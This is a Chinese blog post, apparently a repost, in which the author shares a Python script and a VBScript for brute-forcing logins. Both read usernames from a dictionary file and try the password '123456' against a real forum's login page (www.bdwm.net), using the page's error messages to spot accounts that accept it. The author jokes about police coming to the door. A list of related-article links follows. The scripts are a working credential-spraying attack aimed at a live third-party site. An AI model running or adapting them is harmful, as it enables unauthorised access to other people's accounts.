Python牛刀小试密码爆破
时间:2021-10-05 14:18:47
难道真的要我破解一个么?算了,正好试试我的Python水平。
python版
#coding: gbk
import httplib, urllib
def Check(username, password):
params = urllib.urlencode(
{'userid': username, 'passwd': password})
headers = {"Content-type":
"application/x-www-form-urlencoded"}
conn = httplib.HTTPSConnection("www.bdwm.net")
conn.request("POST",
"/bbs/bbslog2.php", params, headers)
res = conn.getresponse().read()
conn.close()
if res.find("密码不正确") != -1:
return False
elif res.find("不存在这个用户") != -1:
return False
else:
return True
for i in open("English.Dic"):
if Check(i.rstrip(),"123456"):
print i
顺便也写了个VBS版的,感觉貌似VBS比较快,感觉出问题了?
Dim fso
Set fso = CreateObject("scripting.filesystemobject")
With fso.OpenTextFile("English.Dic",1)
Do Until .AtEndOfStream
id = .ReadLine
If Check(id,"123456") Then
WScript.Echo id & vbTab &"OK"
End If
Loop
End With
Function Check(username,password)
Dim http
Set http = CreateObject("Msxml2.XMLHTTP")
http.open _
"POST","https://www.bdwm.net/bbs/bbslog2.php",False
http.setRequestHeader _
"Content-Type","application/x-www-form-urlencoded"
http.send "userid=" & username & "&passwd=" & password
response = AnsiToUnicode(http.responseBody)
If InStr(response,"密码不正确") Then
Check = False
ElseIf InStr(response,"不存在这个用户") Then
Check = False
Else
Check = True
End If
End Function
Function AnsiToUnicode(str)
Dim ado
Set ado = CreateObject("adodb.stream")
ado.Type = 1
ado.Open
ado.Write str
ado.Position = 0
ado.Type = 2
ado.Charset = "gb2312"
AnsiToUnicode = ado.ReadText
End Function
事实证明,123456真是一个无敌的密码。但愿晚上没有警察叔叔敲门。
原文:http://demon.tw/programming/python-a-little-trial.html
标签:密码爆破
0
投稿
猜你喜欢
mysql一对多关联查询分页错误问题的解决方法
2024-01-28 05:18:44
PHP常用字符串函数用法实例总结
2024-05-11 10:01:28
python自动化测试selenium核心技术三种等待方式详解
2023-09-16 09:06:04
Python 实现中值滤波、均值滤波的方法
2022-05-09 08:58:38
Python中那些 Pythonic的写法详解
2023-09-14 20:01:59
JSP学生信息管理系统设计
2023-07-13 03:37:30
Python大批量搜索引擎图像爬虫工具详解
2021-09-15 15:30:02
Python编写合并字典并实现敏感目录的小脚本
2023-05-28 18:36:29
Python图片转换成矩阵,矩阵数据转换成图片的实例
2021-03-31 23:24:35
Pytorch中的 torch.distributions库详解
2021-05-17 22:26:47
go语言中的协程详解
2024-03-13 00:42:24
如何在scrapy中捕获并处理各种异常
2023-04-10 06:56:23
小议sqlserver数据库主键选取策略
2024-01-25 15:03:52
python中opencv图像叠加、图像融合、按位操作的具体实现
2023-11-11 21:39:21
MySQL 数据类型选择原则
2024-01-21 03:02:42
Python+Flask编写一个简单的行人检测API
2023-09-26 17:55:19
PHP asXML()函数讲解
2023-06-08 14:04:37
在Python的gevent框架下执行异步的Solr查询的教程
2022-12-29 11:26:49
MySQL Limit执行过程分析探索
2024-01-14 05:44:31
Python新手如何理解循环加载模块
2022-10-09 00:12:53